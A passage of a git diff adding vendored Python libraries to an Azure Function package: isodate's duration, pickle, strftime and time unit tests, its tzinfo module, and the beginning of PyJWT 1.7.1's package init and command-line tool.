(Duration(years=1, months=2), + timedelta(days=1), + Duration(years=1, months=2, days=1)), + (timedelta(days=1), + Duration(years=1, months=2), + Duration(years=1, months=2, days=1)), + (datetime(2008, 1, 1, 0, 2), + Duration(months=1), + datetime(2008, 2, 1, 0, 2)), + (datetime.strptime("200802", "%Y%M"), + parse_duration("P1M"), + datetime(2008, 2, 1, 0, 2)), + (datetime(2008, 2, 1), + Duration(months=1), + datetime(2008, 3, 1)), + (datetime.strptime("200802", "%Y%m"), + parse_duration("P1M"), + datetime(2008, 3, 1)), + # (date(2000, 1, 1), + # Duration(years=1.5), + # date(2001, 6, 1)), + # (date(2000, 1, 1), + # Duration(years=1, months=1.5), + # date(2001, 2, 14)), + ) + +# A list of test cases of multiplications of durations +# are compared against a given expected result. +DATE_MUL_TEST_CASES = ( + (Duration(years=1, months=1), + 3, + Duration(years=3, months=3)), + (Duration(years=1, months=1), + -3, + Duration(years=-3, months=-3)), + (3, + Duration(years=1, months=1), + Duration(years=3, months=3)), + (-3, + Duration(years=1, months=1), + Duration(years=-3, months=-3)), + (5, + Duration(years=2, minutes=40), + Duration(years=10, hours=3, minutes=20)), + (-5, + Duration(years=2, minutes=40), + Duration(years=-10, hours=-3, minutes=-20)), + (7, + Duration(years=1, months=2, weeks=40), + Duration(years=8, months=2, weeks=280))) + + +class DurationTest(unittest.TestCase): + ''' + This class tests various other aspects of the isoduration module, + which are not covered with the test cases listed above. + ''' + + def test_associative(self): + ''' + Adding 2 durations to a date is not associative. + ''' + days1 = Duration(days=1) + months1 = Duration(months=1) + start = date(2000, 3, 30) + res1 = start + days1 + months1 + res2 = start + months1 + days1 + self.assertNotEqual(res1, res2) + + def test_typeerror(self): + ''' + Test if TypError is raised with certain parameters. + ''' + self.assertRaises(TypeError, parse_duration, date(2000, 1, 1)) + self.assertRaises(TypeError, operator.sub, Duration(years=1), + date(2000, 1, 1)) + self.assertRaises(TypeError, operator.sub, 'raise exc', + Duration(years=1)) + self.assertRaises(TypeError, operator.add, + Duration(years=1, months=1, weeks=5), + 'raise exception') + self.assertRaises(TypeError, operator.add, 'raise exception', + Duration(years=1, months=1, weeks=5)) + self.assertRaises(TypeError, operator.mul, + Duration(years=1, months=1, weeks=5), + 'raise exception') + self.assertRaises(TypeError, operator.mul, 'raise exception', + Duration(years=1, months=1, weeks=5)) + self.assertRaises(TypeError, operator.mul, + Duration(years=1, months=1, weeks=5), + 3.14) + self.assertRaises(TypeError, operator.mul, 3.14, + Duration(years=1, months=1, weeks=5)) + + def test_parseerror(self): + ''' + Test for unparseable duration string. + ''' + self.assertRaises(ISO8601Error, parse_duration, 'T10:10:10') + + def test_repr(self): + ''' + Test __repr__ and __str__ for Duration objects. + ''' + dur = Duration(10, 10, years=10, months=10) + self.assertEqual('10 years, 10 months, 10 days, 0:00:10', str(dur)) + self.assertEqual('isodate.duration.Duration(10, 10, 0,' + ' years=10, months=10)', repr(dur)) + dur = Duration(months=0) + self.assertEqual('0:00:00', str(dur)) + dur = Duration(months=1) + self.assertEqual('1 month, 0:00:00', str(dur)) + + def test_hash(self): + ''' + Test __hash__ for Duration objects. + ''' + dur1 = Duration(10, 10, years=10, months=10) + dur2 = Duration(9, 9, years=9, months=9) + dur3 = Duration(10, 10, years=10, months=10) + self.assertNotEqual(hash(dur1), hash(dur2)) + self.assertNotEqual(id(dur1), id(dur2)) + self.assertEqual(hash(dur1), hash(dur3)) + self.assertNotEqual(id(dur1), id(dur3)) + durSet = set() + durSet.add(dur1) + durSet.add(dur2) + durSet.add(dur3) + self.assertEqual(len(durSet), 2) + + def test_neg(self): + ''' + Test __neg__ for Duration objects. + ''' + self.assertEqual(-Duration(0), Duration(0)) + self.assertEqual(-Duration(years=1, months=1), + Duration(years=-1, months=-1)) + self.assertEqual(-Duration(years=1, months=1), Duration(months=-13)) + self.assertNotEqual(-Duration(years=1), timedelta(days=-365)) + self.assertNotEqual(-timedelta(days=365), Duration(years=-1)) + # FIXME: this test fails in python 3... it seems like python3 + # treats a == b the same b == a + # self.assertNotEqual(-timedelta(days=10), -Duration(days=10)) + + def test_format(self): + ''' + Test various other strftime combinations. + ''' + self.assertEqual(duration_isoformat(Duration(0)), 'P0D') + self.assertEqual(duration_isoformat(-Duration(0)), 'P0D') + self.assertEqual(duration_isoformat(Duration(seconds=10)), 'PT10S') + self.assertEqual(duration_isoformat(Duration(years=-1, months=-1)), + '-P1Y1M') + self.assertEqual(duration_isoformat(-Duration(years=1, months=1)), + '-P1Y1M') + self.assertEqual(duration_isoformat(-Duration(years=-1, months=-1)), + 'P1Y1M') + self.assertEqual(duration_isoformat(-Duration(years=-1, months=-1)), + 'P1Y1M') + dur = Duration(years=3, months=7, days=23, hours=5, minutes=25, + milliseconds=330) + self.assertEqual(duration_isoformat(dur), 'P3Y7M23DT5H25M0.33S') + self.assertEqual(duration_isoformat(-dur), '-P3Y7M23DT5H25M0.33S') + + def test_equal(self): + ''' + Test __eq__ and __ne__ methods. + ''' + self.assertEqual(Duration(years=1, months=1), + Duration(years=1, months=1)) + self.assertEqual(Duration(years=1, months=1), Duration(months=13)) + self.assertNotEqual(Duration(years=1, months=2), + Duration(years=1, months=1)) + self.assertNotEqual(Duration(years=1, months=1), Duration(months=14)) + self.assertNotEqual(Duration(years=1), timedelta(days=365)) + self.assertFalse(Duration(years=1, months=1) != + Duration(years=1, months=1)) + self.assertFalse(Duration(years=1, months=1) != Duration(months=13)) + self.assertTrue(Duration(years=1, months=2) != + Duration(years=1, months=1)) + self.assertTrue(Duration(years=1, months=1) != Duration(months=14)) + self.assertTrue(Duration(years=1) != timedelta(days=365)) + self.assertEqual(Duration(days=1), timedelta(days=1)) + # FIXME: this test fails in python 3... it seems like python3 + # treats a != b the same b != a + # self.assertNotEqual(timedelta(days=1), Duration(days=1)) + + def test_totimedelta(self): + ''' + Test conversion form Duration to timedelta. + ''' + dur = Duration(years=1, months=2, days=10) + self.assertEqual(dur.totimedelta(datetime(1998, 2, 25)), + timedelta(434)) + # leap year has one day more in february + self.assertEqual(dur.totimedelta(datetime(2000, 2, 25)), + timedelta(435)) + dur = Duration(months=2) + # march is longer than february, but april is shorter than + # march (cause only one day difference compared to 2) + self.assertEqual(dur.totimedelta(datetime(2000, 2, 25)), timedelta(60)) + self.assertEqual(dur.totimedelta(datetime(2001, 2, 25)), timedelta(59)) + self.assertEqual(dur.totimedelta(datetime(2001, 3, 25)), timedelta(61)) + + +def create_parsetestcase(durationstring, expectation, format, altstr): + """ + Create a TestCase class for a specific test. + + This allows having a separate TestCase for each test tuple from the + PARSE_TEST_CASES list, so that a failed test won't stop other tests. + """ + + class TestParseDuration(unittest.TestCase): + ''' + A test case template to parse an ISO duration string into a + timedelta or Duration object. + ''' + + def test_parse(self): + ''' + Parse an ISO duration string and compare it to the expected value. + ''' + result = parse_duration(durationstring) + self.assertEqual(result, expectation) + + def test_format(self): + ''' + Take duration/timedelta object and create ISO string from it. + This is the reverse test to test_parse. + ''' + if altstr: + self.assertEqual(duration_isoformat(expectation, format), + altstr) + else: + # if durationstring == '-P2W': + # import pdb; pdb.set_trace() + self.assertEqual(duration_isoformat(expectation, format), + durationstring) + + return unittest.TestLoader().loadTestsFromTestCase(TestParseDuration) + + +def create_mathtestcase(dur1, dur2, resadd, ressub, resge): + """ + Create a TestCase class for a specific test. + + This allows having a separate TestCase for each test tuple from the + MATH_TEST_CASES list, so that a failed test won't stop other tests. + """ + + dur1 = parse_duration(dur1) + dur2 = parse_duration(dur2) + resadd = parse_duration(resadd) + ressub = parse_duration(ressub) + + class TestMathDuration(unittest.TestCase): + ''' + A test case template test addition, subtraction and > + operators for Duration objects. + ''' + + def test_add(self): + ''' + Test operator + (__add__, __radd__) + ''' + self.assertEqual(dur1 + dur2, resadd) + + def test_sub(self): + ''' + Test operator - (__sub__, __rsub__) + ''' + self.assertEqual(dur1 - dur2, ressub) + + def test_ge(self): + ''' + Test operator > and < + ''' + def dogetest(): + ''' Test greater than.''' + return dur1 > dur2 + + def doletest(): + ''' Test less than.''' + return dur1 < dur2 + if resge is None: + self.assertRaises(TypeError, dogetest) + self.assertRaises(TypeError, doletest) + else: + self.assertEqual(dogetest(), resge) + self.assertEqual(doletest(), not resge) + + return unittest.TestLoader().loadTestsFromTestCase(TestMathDuration) + + +def create_datetestcase(start, tdelta, duration): + """ + Create a TestCase class for a specific test. + + This allows having a separate TestCase for each test tuple from the + DATE_TEST_CASES list, so that a failed test won't stop other tests. + """ + + class TestDateCalc(unittest.TestCase): + ''' + A test case template test addition, subtraction + operators for Duration objects. + ''' + + def test_add(self): + ''' + Test operator +. + ''' + self.assertEqual(start + tdelta, start + duration) + + def test_sub(self): + ''' + Test operator -. + ''' + self.assertEqual(start - tdelta, start - duration) + + return unittest.TestLoader().loadTestsFromTestCase(TestDateCalc) + + +def create_datecalctestcase(start, duration, expectation): + """ + Create a TestCase class for a specific test. + + This allows having a separate TestCase for each test tuple from the + DATE_CALC_TEST_CASES list, so that a failed test won't stop other tests. + """ + + class TestDateCalc(unittest.TestCase): + ''' + A test case template test addition operators for Duration objects. + ''' + + def test_calc(self): + ''' + Test operator +. + ''' + if expectation is None: + self.assertRaises(ValueError, operator.add, start, duration) + else: + self.assertEqual(start + duration, expectation) + + return unittest.TestLoader().loadTestsFromTestCase(TestDateCalc) + + +def create_datemultestcase(operand1, operand2, expectation): + """ + Create a TestCase class for a specific test. + + This allows having a separate TestCase for each test tuple from the + DATE_CALC_TEST_CASES list, so that a failed test won't stop other tests. + """ + + class TestDateMul(unittest.TestCase): + ''' + A test case template test addition operators for Duration objects. + ''' + + def test_mul(self): + ''' + Test operator *. + ''' + self.assertEqual(operand1 * operand2, expectation) + + return unittest.TestLoader().loadTestsFromTestCase(TestDateMul) + + +def test_suite(): + ''' + Return a test suite containing all test defined above. + ''' + suite = unittest.TestSuite() + for durationstring, (expectation, format, + altstr) in PARSE_TEST_CASES.items(): + suite.addTest(create_parsetestcase(durationstring, expectation, + format, altstr)) + for testdata in MATH_TEST_CASES: + suite.addTest(create_mathtestcase(*testdata)) + for testdata in DATE_TEST_CASES: + suite.addTest(create_datetestcase(*testdata)) + for testdata in DATE_CALC_TEST_CASES: + suite.addTest(create_datecalctestcase(*testdata)) + for testdata in DATE_MUL_TEST_CASES: + suite.addTest(create_datemultestcase(*testdata)) + suite.addTest(unittest.TestLoader().loadTestsFromTestCase(DurationTest)) + return suite + + +# load_tests Protocol +def load_tests(loader, tests, pattern): + return test_suite() + + +if __name__ == '__main__': + unittest.main(defaultTest='test_suite') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_pickle.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_pickle.py new file mode 100644 index 0000000..66e29a8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_pickle.py @@ -0,0 +1,63 @@ +import unittest + +from six.moves import cPickle as pickle + +import isodate + + +class TestPickle(unittest.TestCase): + ''' + A test case template to parse an ISO datetime string into a + datetime object. + ''' + + def test_pickle_datetime(self): + ''' + Parse an ISO datetime string and compare it to the expected value. + ''' + dti = isodate.parse_datetime('2012-10-26T09:33+00:00') + for proto in range(0, pickle.HIGHEST_PROTOCOL + 1): + pikl = pickle.dumps(dti, proto) + self.assertEqual(dti, pickle.loads(pikl), + "pickle proto %d failed" % proto) + + def test_pickle_duration(self): + ''' + Pickle / unpickle duration objects. + ''' + from isodate.duration import Duration + dur = Duration() + failed = [] + for proto in range(0, pickle.HIGHEST_PROTOCOL + 1): + try: + pikl = pickle.dumps(dur, proto) + if dur != pickle.loads(pikl): + raise Exception("not equal") + except Exception as e: + failed.append("pickle proto %d failed (%s)" % (proto, repr(e))) + self.assertEqual(len(failed), 0, "pickle protos failed: %s" % + str(failed)) + + def test_pickle_utc(self): + ''' + isodate.UTC objects remain the same after pickling. + ''' + self.assertTrue(isodate.UTC is pickle.loads(pickle.dumps(isodate.UTC))) + + +def test_suite(): + ''' + Construct a TestSuite instance for all test cases. + ''' + suite = unittest.TestSuite() + suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestPickle)) + return suite + + +# load_tests Protocol +def load_tests(loader, tests, pattern): + return test_suite() + + +if __name__ == '__main__': + unittest.main(defaultTest='test_suite') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_strf.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_strf.py new file mode 100644 index 0000000..5b7b709 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_strf.py @@ -0,0 +1,136 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +Test cases for the isodate module. +''' +import unittest +import time +from datetime import datetime, timedelta +from isodate import strftime +from isodate import LOCAL +from isodate import DT_EXT_COMPLETE +from isodate import tzinfo + + +TEST_CASES = ((datetime(2012, 12, 25, 13, 30, 0, 0, LOCAL), DT_EXT_COMPLETE, + "2012-12-25T13:30:00+10:00"), + # DST ON + (datetime(1999, 12, 25, 13, 30, 0, 0, LOCAL), DT_EXT_COMPLETE, + "1999-12-25T13:30:00+11:00"), + # microseconds + (datetime(2012, 10, 12, 8, 29, 46, 69178), + "%Y-%m-%dT%H:%M:%S.%f", + "2012-10-12T08:29:46.069178"), + (datetime(2012, 10, 12, 8, 29, 46, 691780), + "%Y-%m-%dT%H:%M:%S.%f", + "2012-10-12T08:29:46.691780"), + ) + + +def create_testcase(dt, format, expectation): + """ + Create a TestCase class for a specific test. + + This allows having a separate TestCase for each test tuple from the + TEST_CASES list, so that a failed test won't stop other tests. + """ + + class TestDate(unittest.TestCase): + ''' + A test case template to test ISO date formatting. + ''' + + # local time zone mock function + def localtime_mock(self, secs): + """ + mock time.localtime so that it always returns a time_struct with + tm_idst=1 + """ + tt = self.ORIG['localtime'](secs) + # befor 2000 everything is dst, after 2000 no dst. + if tt.tm_year < 2000: + dst = 1 + else: + dst = 0 + tt = (tt.tm_year, tt.tm_mon, tt.tm_mday, + tt.tm_hour, tt.tm_min, tt.tm_sec, + tt.tm_wday, tt.tm_yday, dst) + return time.struct_time(tt) + + def setUp(self): + self.ORIG = {} + self.ORIG['STDOFFSET'] = tzinfo.STDOFFSET + self.ORIG['DSTOFFSET'] = tzinfo.DSTOFFSET + self.ORIG['DSTDIFF'] = tzinfo.DSTDIFF + self.ORIG['localtime'] = time.localtime + # ovveride all saved values with fixtures. + # calculate LOCAL TZ offset, so that this test runs in + # every time zone + tzinfo.STDOFFSET = timedelta(seconds=36000) # assume LOC = +10:00 + tzinfo.DSTOFFSET = timedelta(seconds=39600) # assume DST = +11:00 + tzinfo.DSTDIFF = tzinfo.DSTOFFSET - tzinfo.STDOFFSET + time.localtime = self.localtime_mock + + def tearDown(self): + # restore test fixtures + tzinfo.STDOFFSET = self.ORIG['STDOFFSET'] + tzinfo.DSTOFFSET = self.ORIG['DSTOFFSET'] + tzinfo.DSTDIFF = self.ORIG['DSTDIFF'] + time.localtime = self.ORIG['localtime'] + + def test_format(self): + ''' + Take date object and create ISO string from it. + This is the reverse test to test_parse. + ''' + if expectation is None: + self.assertRaises(AttributeError, + strftime(dt, format)) + else: + self.assertEqual(strftime(dt, format), + expectation) + + return unittest.TestLoader().loadTestsFromTestCase(TestDate) + + +def test_suite(): + ''' + Construct a TestSuite instance for all test cases. + ''' + suite = unittest.TestSuite() + for dt, format, expectation in TEST_CASES: + suite.addTest(create_testcase(dt, format, expectation)) + return suite + + +# load_tests Protocol +def load_tests(loader, tests, pattern): + return test_suite() + + +if __name__ == '__main__': + unittest.main(defaultTest='test_suite') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_time.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_time.py new file mode 100644 index 0000000..75b2de9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_time.py @@ -0,0 +1,150 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +Test cases for the isotime module. +''' +import unittest +from datetime import time + +from isodate import parse_time, UTC, FixedOffset, ISO8601Error, time_isoformat +from isodate import TIME_BAS_COMPLETE, TIME_BAS_MINUTE +from isodate import TIME_EXT_COMPLETE, TIME_EXT_MINUTE +from isodate import TIME_HOUR +from isodate import TZ_BAS, TZ_EXT, TZ_HOUR + +# the following list contains tuples of ISO time strings and the expected +# result from the parse_time method. A result of None means an ISO8601Error +# is expected. +TEST_CASES = [('232050', time(23, 20, 50), TIME_BAS_COMPLETE + TZ_BAS), + ('23:20:50', time(23, 20, 50), TIME_EXT_COMPLETE + TZ_EXT), + ('2320', time(23, 20), TIME_BAS_MINUTE), + ('23:20', time(23, 20), TIME_EXT_MINUTE), + ('23', time(23), TIME_HOUR), + ('232050,5', time(23, 20, 50, 500000), None), + ('23:20:50.5', time(23, 20, 50, 500000), None), + # test precision + ('15:33:42.123456', time(15, 33, 42, 123456), None), + ('15:33:42.1234564', time(15, 33, 42, 123456), None), + ('15:33:42.1234557', time(15, 33, 42, 123456), None), + ('2320,8', time(23, 20, 48), None), + ('23:20,8', time(23, 20, 48), None), + ('23,3', time(23, 18), None), + ('232030Z', time(23, 20, 30, tzinfo=UTC), + TIME_BAS_COMPLETE + TZ_BAS), + ('2320Z', time(23, 20, tzinfo=UTC), TIME_BAS_MINUTE + TZ_BAS), + ('23Z', time(23, tzinfo=UTC), TIME_HOUR + TZ_BAS), + ('23:20:30Z', time(23, 20, 30, tzinfo=UTC), + TIME_EXT_COMPLETE + TZ_EXT), + ('23:20Z', time(23, 20, tzinfo=UTC), TIME_EXT_MINUTE + TZ_EXT), + ('152746+0100', time(15, 27, 46, + tzinfo=FixedOffset(1, 0, '+0100')), TIME_BAS_COMPLETE + TZ_BAS), + ('152746-0500', time(15, 27, 46, + tzinfo=FixedOffset(-5, 0, '-0500')), + TIME_BAS_COMPLETE + TZ_BAS), + ('152746+01', time(15, 27, 46, + tzinfo=FixedOffset(1, 0, '+01:00')), + TIME_BAS_COMPLETE + TZ_HOUR), + ('152746-05', time(15, 27, 46, + tzinfo=FixedOffset(-5, -0, '-05:00')), + TIME_BAS_COMPLETE + TZ_HOUR), + ('15:27:46+01:00', time(15, 27, 46, + tzinfo=FixedOffset(1, 0, '+01:00')), + TIME_EXT_COMPLETE + TZ_EXT), + ('15:27:46-05:00', time(15, 27, 46, + tzinfo=FixedOffset(-5, -0, '-05:00')), + TIME_EXT_COMPLETE + TZ_EXT), + ('15:27:46+01', time(15, 27, 46, + tzinfo=FixedOffset(1, 0, '+01:00')), + TIME_EXT_COMPLETE + TZ_HOUR), + ('15:27:46-05', time(15, 27, 46, + tzinfo=FixedOffset(-5, -0, '-05:00')), + TIME_EXT_COMPLETE + TZ_HOUR), + ('15:27:46-05:30', time(15, 27, 46, + tzinfo=FixedOffset(-5, -30, '-05:30')), + TIME_EXT_COMPLETE + TZ_EXT), + ('15:27:46-0545', time(15, 27, 46, + tzinfo=FixedOffset(-5, -45, '-0545')), + TIME_EXT_COMPLETE + TZ_BAS), + ('1:17:30', None, TIME_EXT_COMPLETE)] + + +def create_testcase(timestring, expectation, format): + """ + Create a TestCase class for a specific test. + + This allows having a separate TestCase for each test tuple from the + TEST_CASES list, so that a failed test won't stop other tests. + """ + + class TestTime(unittest.TestCase): + ''' + A test case template to parse an ISO time string into a time + object. + ''' + + def test_parse(self): + ''' + Parse an ISO time string and compare it to the expected value. + ''' + if expectation is None: + self.assertRaises(ISO8601Error, parse_time, timestring) + else: + result = parse_time(timestring) + self.assertEqual(result, expectation) + + def test_format(self): + ''' + Take time object and create ISO string from it. + This is the reverse test to test_parse. + ''' + if expectation is None: + self.assertRaises(AttributeError, + time_isoformat, expectation, format) + elif format is not None: + self.assertEqual(time_isoformat(expectation, format), + timestring) + + return unittest.TestLoader().loadTestsFromTestCase(TestTime) + + +def test_suite(): + ''' + Construct a TestSuite instance for all test cases. + ''' + suite = unittest.TestSuite() + for timestring, expectation, format in TEST_CASES: + suite.addTest(create_testcase(timestring, expectation, format)) + return suite + + +# load_tests Protocol +def load_tests(loader, tests, pattern): + return test_suite() + + +if __name__ == '__main__': + unittest.main(defaultTest='test_suite') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tzinfo.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tzinfo.py new file mode 100644 index 0000000..b1dd01a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tzinfo.py @@ -0,0 +1,157 @@ +''' +This module provides some datetime.tzinfo implementations. + +All those classes are taken from the Python documentation. +''' +from datetime import timedelta, tzinfo +import time + +ZERO = timedelta(0) +# constant for zero time offset. + + +class Utc(tzinfo): + '''UTC + + Universal time coordinated time zone. + ''' + + def utcoffset(self, dt): + ''' + Return offset from UTC in minutes east of UTC, which is ZERO for UTC. + ''' + return ZERO + + def tzname(self, dt): + ''' + Return the time zone name corresponding to the datetime object dt, + as a string. + ''' + return "UTC" + + def dst(self, dt): + ''' + Return the daylight saving time (DST) adjustment, in minutes east + of UTC. + ''' + return ZERO + + def __reduce__(self): + ''' + When unpickling a Utc object, return the default instance below, UTC. + ''' + return _Utc, () + + +UTC = Utc() +# the default instance for UTC. + + +def _Utc(): + ''' + Helper function for unpickling a Utc object. + ''' + return UTC + + +class FixedOffset(tzinfo): + ''' + A class building tzinfo objects for fixed-offset time zones. + + Note that FixedOffset(0, 0, "UTC") or FixedOffset() is a different way to + build a UTC tzinfo object. + ''' + + def __init__(self, offset_hours=0, offset_minutes=0, name="UTC"): + ''' + Initialise an instance with time offset and name. + The time offset should be positive for time zones east of UTC + and negate for time zones west of UTC. + ''' + self.__offset = timedelta(hours=offset_hours, minutes=offset_minutes) + self.__name = name + + def utcoffset(self, dt): + ''' + Return offset from UTC in minutes of UTC. + ''' + return self.__offset + + def tzname(self, dt): + ''' + Return the time zone name corresponding to the datetime object dt, as a + string. + ''' + return self.__name + + def dst(self, dt): + ''' + Return the daylight saving time (DST) adjustment, in minutes east of + UTC. + ''' + return ZERO + + def __repr__(self): + ''' + Return nicely formatted repr string. + ''' + return "" % self.__name + + +STDOFFSET = timedelta(seconds=-time.timezone) +# locale time zone offset + +# calculate local daylight saving offset if any. +if time.daylight: + DSTOFFSET = timedelta(seconds=-time.altzone) +else: + DSTOFFSET = STDOFFSET + +DSTDIFF = DSTOFFSET - STDOFFSET +# difference between local time zone and local DST time zone + + +class LocalTimezone(tzinfo): + """ + A class capturing the platform's idea of local time. + """ + + def utcoffset(self, dt): + ''' + Return offset from UTC in minutes of UTC. + ''' + if self._isdst(dt): + return DSTOFFSET + else: + return STDOFFSET + + def dst(self, dt): + ''' + Return daylight saving offset. + ''' + if self._isdst(dt): + return DSTDIFF + else: + return ZERO + + def tzname(self, dt): + ''' + Return the time zone name corresponding to the datetime object dt, as a + string. + ''' + return time.tzname[self._isdst(dt)] + + def _isdst(self, dt): + ''' + Returns true if DST is active for given datetime object dt. + ''' + tt = (dt.year, dt.month, dt.day, + dt.hour, dt.minute, dt.second, + dt.weekday(), 0, -1) + stamp = time.mktime(tt) + tt = time.localtime(stamp) + return tt.tm_isdst > 0 + + +# the default instance for local time zone. +LOCAL = LocalTimezone() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__init__.py new file mode 100644 index 0000000..6122f8d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__init__.py @@ -0,0 +1,31 @@ +# -*- coding: utf-8 -*- +# flake8: noqa + +""" +JSON Web Token implementation + +Minimum implementation based on this spec: +http://self-issued.info/docs/draft-jones-json-web-token-01.html +""" + + +__title__ = 'pyjwt' +__version__ = '1.7.1' +__author__ = 'José Padilla' +__license__ = 'MIT' +__copyright__ = 'Copyright 2015-2018 José Padilla' + + +from .api_jwt import ( + encode, decode, register_algorithm, unregister_algorithm, + get_unverified_header, PyJWT +) +from .api_jws import PyJWS +from .exceptions import ( + InvalidTokenError, DecodeError, InvalidAlgorithmError, + InvalidAudienceError, ExpiredSignatureError, ImmatureSignatureError, + InvalidIssuedAtError, InvalidIssuerError, ExpiredSignature, + InvalidAudience, InvalidIssuer, MissingRequiredClaimError, + InvalidSignatureError, + PyJWTError, +) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__main__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__main__.py new file mode 100644 index 0000000..396dc0d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__main__.py @@ -0,0 +1,168 @@ +#!/usr/bin/env python + +from __future__ import absolute_import, print_function + +import argparse +import json +import sys +import time + +from . import DecodeError, __version__, decode, encode + + +def encode_payload(args): + # Try to encode + if args.key is None: + raise ValueError('Key is required when encoding. See --help for usage.') + + # Build payload object to encode + payload = {} + + for arg in args.payload: + k, v = arg.split('=', 1) + + # exp +offset special case? + if k == 'exp' and v[0] == '+' and len(v) > 1: + v = str(int(time.time()+int(v[1:]))) + + # Cast to integer? + if v.isdigit(): + v = int(v) + else: + # Cast to float? + try: + v = float(v) + except ValueError: + pass + + # Cast to true, false, or null? + constants = {'true': True, 'false': False, 'null': None} + + if v in constants: + v = constants[v] + + payload[k] = v + + token = encode( + payload, + key=args.key, + algorithm=args.algorithm + ) + + return token.decode('utf-8') + + +def decode_payload(args): + try: + if args.token: + token = args.token + else: + if sys.stdin.isatty(): + token = sys.stdin.readline().strip() + else: + raise IOError('Cannot read from stdin: terminal not a TTY') + + token = token.encode('utf-8') + data = decode(token, key=args.key, verify=args.verify) + + return json.dumps(data) + + except DecodeError as e: + raise DecodeError('There was an error decoding the token: %s' % e) + + +def build_argparser(): + + usage = ''' + Encodes or decodes JSON Web Tokens based on input. + + %(prog)s [options] [options] input + + Decoding examples: + + %(prog)s --key=secret decode json.web.token + %(prog)s decode --no-verify json.web.token + + Encoding requires the key option and takes space separated key/value pairs + separated by equals (=) as input. Examples: + + %(prog)s --key=secret encode iss=me exp=1302049071 + %(prog)s --key=secret encode foo=bar exp=+10 + + The exp key is special and can take an offset to current Unix time. + ''' + + arg_parser = argparse.ArgumentParser( + prog='pyjwt', + usage=usage + ) + + arg_parser.add_argument( + '-v', '--version', + action='version', + version='%(prog)s ' + __version__ + ) + + arg_parser.add_argument( + '--key', + dest='key', + metavar='KEY', + default=None, + help='set the secret key to sign with' + ) + + arg_parser.add_argument( + '--alg', + dest='algorithm', + metavar='ALG', + default='HS256', + help='set crypto algorithm to sign with. default=HS256' + ) + + subparsers = arg_parser.add_subparsers( + title='PyJWT subcommands', + description='valid subcommands', + help='additional help' + ) + + # Encode subcommand + encode_parser = subparsers.add_parser('encode', help='use to encode a supplied payload') + + payload_help = """Payload to encode. Must be a space separated list of key/value + pairs separated by equals (=) sign.""" + + encode_parser.add_argument('payload', nargs='+', help=payload_help) + 